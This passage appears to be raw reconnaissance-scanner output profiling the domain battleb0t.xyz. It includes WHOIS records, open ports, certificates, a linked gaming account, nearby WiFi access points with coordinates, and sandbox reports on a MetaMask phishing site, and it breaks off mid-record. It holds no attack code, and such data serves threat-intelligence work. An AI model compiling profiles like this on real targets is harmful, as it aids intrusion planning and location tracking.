NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 02:46:50 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515594BD (Net ID: 00:01:E3:55:94:BD) | 52.3759, 4.8975 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:62:55) | 52.3759, 4.8975 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.179): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) | 37.780462,-122.390564 |
| 2023-05-12 02:44:59 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.108.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.108.153 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.75 | 34.74.170.74 |
| 2023-05-12 03:01:31 | Web Server | No | Tool - WhatWeb | 0 | 1 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c581b373d7d806c-ORD"]} | 188.114.96.1 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/Battleb0t | Battleb0t |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
|
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007hyno.github.io | 185.199.111.153 |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| amcodev.me |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | fluid.battleb0t.xyz | [{"url": "https://fluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://fluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sanctuary_Mixer (Net ID: 00:18:F8:CB:D4:48) | 32.8608, -79.9746 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.132): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.196): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2083 | 172.67.168.252 |
| 2023-05-12 02:54:22 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | panel.battleb0t.xyz |
| 2023-05-12 02:59:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/title_screen.ks', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_ee8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "CommunicationManager_Mutex"\n "IsoScope_ee8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ee8_IE_EarlyTabStart_0xbec_Mutex"\n "IsoScope_ee8_ConnHashTable<3816>_HashTable_Mutex"\n "SmartScreen_ClientId_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ee8_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3816"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ee8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is 
"data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"68.142.107.4:80"\n "34.74.170.74:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6K2AH6HE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6K2AH6HE.txt]- [targetUID: 00000000-00003816]\n "_D23AE930-21A5-11ED-9DE3-0800274FB80B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003816]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003140]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- 
[targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003816]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003816]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00003140]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003816]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00003140]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003816]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "V403NUKD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V403NUKD.txt]- [targetUID: 00000000-00003816]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00003140]\n "B126BF247C927A243E186240F06A7849" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00003140]\n "~DF3C871276C75B1A46.TMP" has type "data"- Location: 
[%TEMP%\\~DF3C871276C75B1A46.TMP]- [targetUID: 00000000-00003816]'}, {u'category': u'Anti-Detection/Stealthyness', u'origin': u'File/Memory', u'identifier': u'string-8', u'name': u'Possibly checks for the presence of an Antivirus engine', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1518/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-581', u'attck_id': u'T1518.001', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"ScanWithAntiVirus" (Indicator: "antivirus")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /data/scenario/title_screen.ks HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: 62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 919\nContent-Type: application/x-java-keystore\nDate: Mon, 22 Aug 2022 00:42:54 GMT\nEtag: "5e9fe1c325b7a0897e0c555aed829a27-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-Nf-Request-Id: 01GB1G18GKPSKJTJSA7CH2JSYN\nX-Robots-Tag: noindex\n\n[_tb_system_call storage=system/_title_screen.ks]\n\n[hidemenubutton]\n\n[tb_clear_images]\n\n[bg time="3000" method="crossfade" storage=".jpg" ]\n[bg time="4000" method="crossfade" storage=".jpg" ]\n[tb_keyconfig flag="0" ]\n[playbgm volume="100" time="3000" loop="true" storage="Shiokaze.ogg" fadein="true" ]\n[bg time="3000" method="crossfade" storage="3.jpg" 
]\n[tb_hide_message_window ]\n*title\n\n[glink color="black" text="" x="601" y="399" size="24" target="*start" width="" height="" _clickable_img="" ]\n[glink color="black" text="" x="603" y="470" size="24" target="*load" width="" height="" _clickable_img="" ]\n[s ]\n*start\n\n[showmenubutton]\n\n[cm ]\n[tb_keyc"- [Source: SSL_34.74.170.74]\n\n "onfig flag="1" ]\n[jump storage="scene1.ks" target="*start" ]\n[s ]\n*load\n\n[cm ]\n[showload]\n\n[jump target="*start" storage="scene1.ks" ]"- [Source: SSL_34.74.170.74]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/title_screen.ks"- [Source: Input]\n Pattern match: "https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: https://www.toprankedtechgadgetsnow.com/p/tf?affid=8929&provider=Affiliati&click_id=4c7be4a3aa954e6aaf004f0b7fc6f99f&c1=&c2=506642641&c3=&showLoading=1&xyz=30.0 (AV positives: 1/88 scanned on 08/22/2022 00:05:35)\n URL: https://www.durangoagency.com/4354fprta7af937sr12350fcd (AV positives: 4/88 scanned on 08/21/2022 23:58:47)\n URL: https://gabrielelisavetsky.com/ (AV positives: 1/88 scanned on 08/21/2022 23:11:34)\n URL: https://pixlegame.com/ (AV positives: 1/88 scanned on 08/21/2022 22:00:13)\n URL: 
http://zsuzsahudacsko.com/ (AV positives: 1/88 scanned on 08/21/2022 20:49:57)\n File SHA256: e4f875a727ff02309cdd1349884ee4d8313fb62719b1a15bfe795b6de56fbb37 (AV positives: 23/75 scanned on 08/20/2022 00:17:25)\n File SHA256: 0aff84aa363dd4cfaad6b77fd6ee53bd542a7a4067a9c9d8b3bd541f362e6443 (AV positives: 1/74 scanned on 08/18/2 | 34.74.170.74 |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamask3.cc/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xda8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"103.60.109.137:80"\n "185.199.111.153:443"\n "65.8.165.91:443"\n "58.216.15.119:443"\n "142.251.32.42:80"\n "142.251.46.163:443"\n "142.250.188.3:80"\n "104.16.89.50:443"\n "104.17.210.243:443"\n "104.17.214.243:443"\n "142.250.189.238:443"\n "142.250.188.3:443"\n "142.251.46.194:443"\n "142.251.46.230:443"\n "142.250.189.202:443"\n "172.217.164.118:443"\n "142.250.189.161:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamask3.cc"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /fonts/EuclidCircularB-Regular-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"\n "GET /fonts/EuclidCircularB-Bold-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
